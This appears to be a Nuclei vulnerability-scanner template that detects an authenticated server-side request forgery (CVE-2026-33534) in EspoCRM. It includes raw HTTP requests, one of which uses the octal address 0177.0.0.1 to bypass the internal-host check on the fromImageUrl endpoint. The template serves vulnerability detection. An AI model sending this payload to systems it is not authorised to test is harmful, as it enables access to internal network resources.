id: CVE-2026-33534 info: name: EspoCRM - Server-Side Request Forgery author: EntroVyx severity: medium description: | EspoCRM <= 9.3.3 contains an authenticated server-side request forgery caused by improper internal-host validation using alternative IPv4 formats in HostCheck::isNotInternalHost(), letting authenticated users access internal resources via /api/v1/Attachment/fromImageUrl endpoint. impact: | Authenticated attackers can access internal network resources, potentially exposing sensitive data or internal services. remediation: | Upgrade to version 9.3.4 or later. reference: - https://github.com/espocrm/espocrm/security/advisories/GHSA-h7gx-8gwv-7g73 - https://nvd.nist.gov/vuln/detail/CVE-2026-33534 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N cvss-score: 4.3 cve-id: CVE-2026-33534 cwe-id: CWE-918 metadata: verified: true max-request: 2 vendor: espocrm product: espocrm tags: cve,cve2026,espocrm,ssrf,authenticated,intrusive flow: http(1) && http(2) http: - raw: - | POST /api/v1/Attachment/fromImageUrl HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64(username + ':' + password)}} Content-Type: application/json Accept: application/json {"url":"http://127.0.0.1:80/client/img/logo-light.svg","field":"avatar","parentType":"User"} matchers: - type: dsl dsl: - 'status_code == 403' internal: true - raw: - | POST /api/v1/Attachment/fromImageUrl HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64(username + ':' + password)}} Content-Type: application/json Accept: application/json {"url":"http://0177.0.0.1:80/client/img/logo-light.svg","field":"avatar","parentType":"User"} matchers: - type: dsl dsl: - 'status_code == 200' - 'contains_all(body, "\"id\"", "\"field\":\"avatar\"", "\"parentType\":\"User\"", "0177.0.0.1")' condition: and